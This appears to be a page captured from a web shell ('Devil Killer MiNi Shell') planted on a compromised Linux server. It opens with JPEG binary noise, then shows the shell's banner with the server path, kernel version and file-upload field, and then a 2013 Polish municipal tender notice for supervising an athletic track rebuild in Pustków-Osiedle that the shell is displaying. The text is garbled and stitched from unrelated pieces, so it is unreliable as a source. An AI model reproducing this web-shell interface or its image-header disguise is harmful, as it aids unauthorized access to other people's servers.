JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131127/486804-N-2013.html

<p class="kh_header"><b>Dębica: Pełnienie obowiązków inspektora nadzoru inwestorskiego w zakresie robót  budowlanych na zadaniu  inwestycyjnym: Przebudowa bieżni lekkoatletycznej wraz z infrastrukturą w Pustkowie-Osiedlu gm. Dębica -w ramach Kompleksu  Rekreacyjno-Turystycznego  w Pustkowie-Osiedlu</b><br>
<b>Numer ogłoszenia: 486804 - 2013; data zamieszczenia: 27.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy w Dębicy , ul. Batorego 13, 39-200 Dębica, woj. podkarpackie, tel. 14 6803342, 6803310, faks 14 6803336.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugdebica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie obowiązków inspektora nadzoru inwestorskiego w zakresie robót  budowlanych na zadaniu  inwestycyjnym: Przebudowa bieżni lekkoatletycznej wraz z infrastrukturą w Pustkowie-Osiedlu gm. Dębica -w ramach Kompleksu  Rekreacyjno-Turystycznego  w Pustkowie-Osiedlu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Opis  przedmiotu  zamówienia : 

Pełnienie obowiązków inspektora nadzoru inwestorskiego w zakresie robót  budowlanych na zadaniu  inwestycyjnym: Przebudowa bieżni lekkoatletycznej wraz z infrastrukturą w Pustkowie-Osiedlu gm. Dębica
 - w ramach Kompleksu  Rekreacyjno-Turystycznego  w Pustkowie-Osiedlu.

Zakres robót budowlanych przewidzianych do nadzoru inwestorskiego obejmuje:
1) Roboty przygotowawcze,
2) Roboty ziemne,
3) Konstrukcję bieżni,
4) Zeskocznia do skoków w dal,
5) Wykonanie ogrodzenia,
6) Wyposażenie zeskoczni do skoków w dal.
Wykonawca robót budowlanych winien uzyskać ostateczne pozwolenie na użytkowanie obiektu.

2. Zakres  zadania inwestycyjnego przewidzianego do nadzoru inwestorskiego opisany  jest  w : 
Dokumentacji  projektowej:  projekt budowlano-wykonawczy, specyfikacja techniczna wykonania i odbioru robót, przedmiary robót  wykonane przez firmę: Biuro projektowe ART-FAKTORY s.c. arch. Paweł Spędzia i Wioletta Spędzia, ul. Powstania Styczniowego 4 , 39-200 Dębica.
Z uwagi na przyjęte w umowie o roboty budowlane wynagrodzenie ryczałtowe, przedmiary robót mają jedynie charakter pomocniczy i służą do uszczegółowienia opisu przedmiotu zamówienia oraz będą pomocne przy rozliczeniu inwestycji.
Wykonawca nadzoru inwestorskiego winien uwzględnić wszystkie elementy ujęte w dokumentach :
- Wyjaśnienia treści SIWZ i Zmiana treści SIWZ zamieszczone na stronie internetowej Zamawiającego: www.ugdebica.pl w dniu 30 października  2013 r. i 08 listopada 2013 r. podczas przeprowadzenia postępowania o udzielenie zamówienia publicznego na roboty budowlane:  Przebudowa bieżni lekkoatletycznej wraz z infrastrukturą 
w Pustkowie-Osiedlu gm. Dębica - w ramach Kompleksu  Rekreacyjno-Turystycznego  w Pustkowie-Osiedlu.

3. Nadzór inwestorski winien być wykonywany zgodnie z art.25 i 26 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz.U. z 2010 r. Nr 243 poz.1623 z późniejszymi zmianami ), w szczególności:  
1) Uczestnictwo w przekazaniu placu budowy  Wykonawcy robót budowlanych,
2) Kontrolę jakości wykonywanych robót, wbudowywanych elementów i stosowanych materiałów, zgodnie z przepisami techniczno - budowlanymi, normami państwowymi, zasadami bezpieczeństwa budowy w toku realizacji, zasadami współczesnej wiedzy technicznej oraz zapisami w specyfikacjach technicznych wykonania i odbioru robót budowlanych,
3) Kontrolę przebiegu robót zgodnie z harmonogramem rzeczowo- finansowym oraz terminowości wykonania robót budowlanych i dostaw, opracowanym przez Wykonawcę robót budowlanych i zaakceptowanym przez Inwestora,, 
4) Kontrolę zgodności zakresu wykonywanych robót budowlanych z dokumentacją projektową oraz warunkami umowy 
z Wykonawcą robót budowlanych z uwzględnieniem ewentualnych robót dodatkowych zaakceptowanych pisemnie przez Inwestora,
5) Nadzór nad prawidłowym wykonaniem robót przez Wykonawcę robót budowlanych oraz podwykonawców (również 
w zakresie który został ewentualnie niedostatecznie określony lub pominięty w dokumentacji projektowej) 
 w ilości minimum 3 wizyt w każdym tygodniu, w którym prowadzone są roboty budowlane, na placu budowy, potwierdzony wpisem do zeszytu wizyt wydanego przez Inwestora, wraz z krótkim opisem wizytowanego zakresu robót. Wpis dla swej ważności musi być potwierdzony podpisem radnego Gminy Dębica (z miejscowości  Pustków-Osiedle) lub sołtysa (z miejscowości Pustków-Osiedle) lub upoważnionego pracownika Urzędu Gminy Dębica lub Dyrektora Gminnego Ośrodka Sportu i Rekreacji Gminy Dębica. 
6) Kontrolę prawidłowości zafakturowania wykonanych robót;
7) Rozstrzyganie wątpliwości natury technicznej powstałych w toku wykonywania robót, zasięgając w razie potrzeby opinii  rzeczoznawców; 
8) Udział w komisjach technicznych powoływanych do oceny lub rozstrzygania technicznych spraw inwestycji w toku jej realizacji oraz w komisjach powołanych do stwierdzenia ujawnionych wad w okresie trwania gwarancji i rękojmi (w tym udział w odbiorach pogwarancyjnych),
9) Czuwanie nad przestrzeganiem zakazu wbudowywania materiałów i wyrobów nie dopuszczonych do stosowania 
w budownictwie, w tym sprawdzanie posiadania przez Wykonawcę robót budowlanych (kierownika budowy) odpowiednich dokumentów (atestów, świadectw jakości, wyników badań, dotyczących elementów prefabrykowanych 
i innych wyrobów), dokonywanie ich oceny na placu budowy  przed ich wbudowaniem,
 10) W razie braku wymaganych dokumentów  stwierdzających właściwą jakość lub też w razie zastrzeżeń dotyczących jakości wyrobu przewidzianego do wbudowania , Inspektor  nadzoru ma obowiązek żądania od Wykonawcy odpowiednich badań i przedstawienia ekspertyz technicznych lub zamiany wadliwego materiału z równoczesnym pisemnym powiadomieniem Inwestora o zaistniałym fakcie, 
11) Sprawdzanie i odbiór (częściowy, końcowy) robót budowlanych ulegających zakryciu lub zanikających, 
z obowiązkiem przedłożenia protokołów - 1 raz na koniec miesiąca kalendarzowego, uczestniczenie w próbach 
i odbiorach technicznych, instalacji, urządzeń technicznych oraz przygotowanie i udział 
w czynnościach odbioru gotowych obiektów budowlanych i przekazywaniu ich do użytkowania;
12) Potwierdzenie faktycznie wykonanych robót oraz usunięcia wad, a także, wydawanie kierownikowi budowy lub kierownikowi robót poleceń potwierdzonych wpisem do dziennika budowy dotyczących: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych, dowodów dopuszczenia do obrotu i stosowania 
w budownictwie wyrobów budowlanych oraz urządzeń technicznych;
13) prawo żądania od kierownika budowy lub kierownika robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót, a także wstrzymania dalszych robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem na budowę.
14) Przygotowanie i udziału w czynnościach odbioru końcowego wykonanego przez Wykonawcę obiektu budowlanego 
i przekazania go do użytkowania a także przygotowanie i udział w odbiorach częściowych,  
15) Uczestniczenie ,w okresie gwarancji, na pisemne wezwanie Zamawiającego w odbiorach gwarancyjnych robót budowlanych zrealizowanych przez wykonawcę robót budowlanych   w ramach umowy o roboty budowlane,
16) Na żądanie Zamawiającego składanie pisemnych informacji z przebiegu robót budowlanych,
17) Uczestniczenie co najmniej raz  w miesiącu w naradach koordynacyjnych zwoływanych przez  Zamawiającego lub wykonawcę robót, oraz sporządzania protokołów z tych narad i przekazywania ich Zamawiającemu i Wykonawcy robót w terminie 3 dni od dnia narady,  
18) Uczestniczenie w przygotowaniu kompletnego zawiadomienia o zakończeniu budowy,  
19) Niezależnie od obowiązków określonych powyżej, na każde żądanie Zamawiającego stawianie się na placu budowy lub w siedzibie Zamawiającego w ciągu 24 godzin. 
4. Bez pisemnej zgody Zamawiającego Inspektor Nadzoru nie jest upoważniony do wydawania wykonawcy polecenia wykonania robót  dodatkowych lub zamiennych. 
5. Inspektor Nadzoru jest, w granicach posiadanego umocowania niniejszą umową, przedstawicielem Zamawiającego na budowie, a godziny pracy Inspektora Nadzoru będą dostosowane do czasu pracy Wykonawcy robót budowlanych. 
6. Inspektor Nadzoru jest zobowiązany do wykonania badań uziarnienia kruszyw użytych do podbudowy, sprawdzenia grubości warstw podbudowy i nawierzchniowej badania wodoprzepuszczalności warstw podbudowy, oraz stopnia zagęszczenia podbudowy  metodą VHS, a po zakończonej budowie- instalacji nawierzchni dokonać  sprawdzenia wyglądu zewnętrznego nawierzchni, sprawdzenie rzędnych wysokościowych , równość podłużną  i poprzeczną, spadki poprzeczne i szerokość zgodnie z projektem..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek posiadania wiedzy i doświadczenia jest spełniony, jeżeli Wykonawca złoży wraz z ofertą Oświadczenie o spełnianiu warunków udziału w postępowaniu - (Załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek dysponowania odpowiednim potencjałem technicznym jest spełniony, jeżeli Wykonawca złoży wraz z ofertą Oświadczenie w zakresie art.22 ust.1 ustawy Pzp - (Załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek dysponowania osobami zdolnymi do wykonania zamówienia jest spełniony, jeżeli Wykonawca wykaże, że w wykonaniu zamówienia będą uczestniczyć osoby z uprawnieniami do pełnienia   samodzielnych  funkcji technicznych  w budownictwie, w zakresie kierowania i nadzorowania robót budowlanych tj.  minimum 1 osoba w  specjalności:

a) konstrukcyjno - budowlanej bez ograniczeń
-dotyczy uprawnień budowlanych wydanych na podstawie Rozporządzenia Ministra Gospodarki Przestrzennej i Budownictwa z dnia 30 grudnia 1994 r. w sprawie samodzielnych funkcji technicznych w budownictwie - Dz.U. Nr 98 poz 1071 z 2000 r. , obejmujące  uprawnienia w zakresie dróg ,  która będzie pełnić obowiązki koordynatora nadzoru inwestorskiego, posiadająca uprawnienia budowlane w zakresie kierowania robotami budowlanymi bez ograniczeń w tej specjalności,  LUB: 
 b) - drogowej lub mostowej i specjalizacji techniczno- budowlanej do kierowania robotami budowlanymi w zakresie drogowych obiektów inżynierskich - bez ograniczeń,

 - lub uprawnienia równoważne do powyższych, a wydane na podstawie wcześniej obowiązujących przepisów prawa .
  

 Opis rodzaju uprawnień budowlanych z wskazaniem, że są to uprawnienia budowlane bez ograniczeń i opis rodzaju
specjalności posiadanych uprawnień należy zamieścić w Wykazie osób (Załącznik nr 3 do SIWZ)  w kolumnie : 
-Posiadane kwalifikacje zawodowe- .
  

Z zapisów w Wykazie osób winno jednoznacznie wynikać spełnianie warunku dysponowania osobami zdolnymi do wykonania zamówienia tj. zapisy dotyczące uprawnień budowlanych winny bez jakichkolwiek wątpliwości wskazywać na posiadanie w-w uprawnień budowlanych bez ograniczeń. Jeżeli Wykonawca będzie wskazywał uprawnienia budowlane równoważne do aktualnie obowiązujących tj. wymienionych w Rozporządzeniu Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie - Dz.U. 2006 nr 83 poz. 578  z zm., winien jednoznacznie i wyczerpująco opisać ich zakres, rodzaj i specjalność oraz  wykazać, że są to uprawnienia bez ograniczeń - równoważne do opisanych w pkt 2) i wymienionych w w-w rozporządzeniu. 
Z zapisów w Wykazie osób winna jednoznacznie wynikać podstawa do dysponowania osobami, które będą uczestniczyć w wykonywaniu zamówienia (kolumna: Informacja o podstawie do dysponowania tymi osobami) . Należy wskazać na jakiej podstawie wykonawca będzie dysponował osobami wskazując, że jest to np. umowa o pracę, umowa zlecenia, umowa o dzieło itp.   

 W przypadku oferty złożonej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego - art.23 ust.1 ustawy Pzp,  oceniany będzie ich łączny potencjał techniczny i łączne dysponowanie osobami zdolnymi do wykonania zamówienia .

                   Zamawiający, określając wymagania dla osób w zakresie posiadania uprawnień budowlanych dopuszcza odpowiadające im uprawnienia, wydane obywatelom państw Europejskiego Obszaru gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art.12a oraz innych przepisów ustawy Prawo budowlane (tekst jednolity Dz.U. z 2006 r. 
Nr 156, poz.1118 z późn.zmianami) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2008 r. Nr 63, poz.394)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek  dotyczący sytuacji ekonomicznej i finansowej jest spełniony, jeżeli Wykonawca złoży wraz z ofertą Oświadczenie o spełnianiu warunków udziału w postępowaniu - (Załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Zgodnie z art.44 ustawy Prawo zamówień publicznych , wykonawca składa wraz z ofertą oświadczenie o spełnieniu warunków udziału w postępowaniu (Załącznik nr 2 do SIWZ), a jeżeli zamawiający żąda dokumentów potwierdzających spełnianie tych warunków, również te dokumenty. 2.Zgodnie z art. 26 ust.2b ustawy Pzp, wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. W przypadku złożenia wraz z ofertą przez Wykonawców w-w zobowiązania, Zamawiający powołując się na przepis art.26. ust 2b ustawy Pzp, przepisy art. 78 § 1 Kodeksu Cywilnego, oraz orzecznictwo KIO, stwierdza iż wymaganie formy pisemnej zobowiązania zostanie spełnione jedynie poprzez złożenie oryginału dokumentu zawierającego własnoręczny podpis osoby pod treścią oświadczenia - zobowiązania innego podmiotu, do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Jeżeli Wykonawca, wykazując spełnianie warunków, których mowa w art.22 ust.1 ustawy Pzp, których opis sposobu dokonywania oceny Zamawiający określił w Rozdziale V SIWZ , polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, Zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów , żąda dokumentów dotyczących w szczególności: a) zakresu dostępnych wykonawcy zasobów innego podmiotu, b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. (Podstawa prawna: § 1 ust. 6 - Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane- Dz.U. z 2013 r. poz. 231) Ponieważ ustawodawca użył w w-w przepisie sformułowania -w szczególności- żądanie powyższych dokumentów (punkty a - d), ma charakter przykładowy i nie jest wyczerpujące. W zależności od rodzaju przedłożonych dokumentów i sposobu sformułowania ich treści, zamawiający może żądać innych dokumentów, które w sposób jednoznaczny i wyczerpujący udowodnią zamawiającemu, że wykonawca będzie dysponował zasobami niezbędnymi do wykonania zamówienia i pozwolą dokonać: oceny czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów. 3. W przypadku składania oferty przez pełnomocnika, do oferty należy załączyć pełnomocnictwo w oryginale lub w formie kopii potwierdzonej notarialnie. 4. W przypadku oferty złożonej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego - art.23 ust.2 ustawy Pzp (np. Konsorcjum , spółki cywilne) do oferty muszą być dołączone indywidualne oświadczenia i dokumenty wymienione w Rozdziale VI ust.2 SIWZ i w Sekcji III.4.2) ogłoszenia o zamówieniu, dotyczące każdego z uczestników konsorcjum- wspólnika spółki cywilnej. W przypadku spółek cywilnych, Zamawiający wymaga również złożenia dokumentów wymienionych w Rozdziale VI ust.2 pkt 3) i 4) i Sekcji III.4.2) tiret 3 i 4 ogłoszenia o zamówieniu (ZUS i Nacz.Urz.Skarbowego) wystawionych na spółkę cywilną. 5. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia (zgodnie z art.23 ust.2 ustawy Pzp) ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

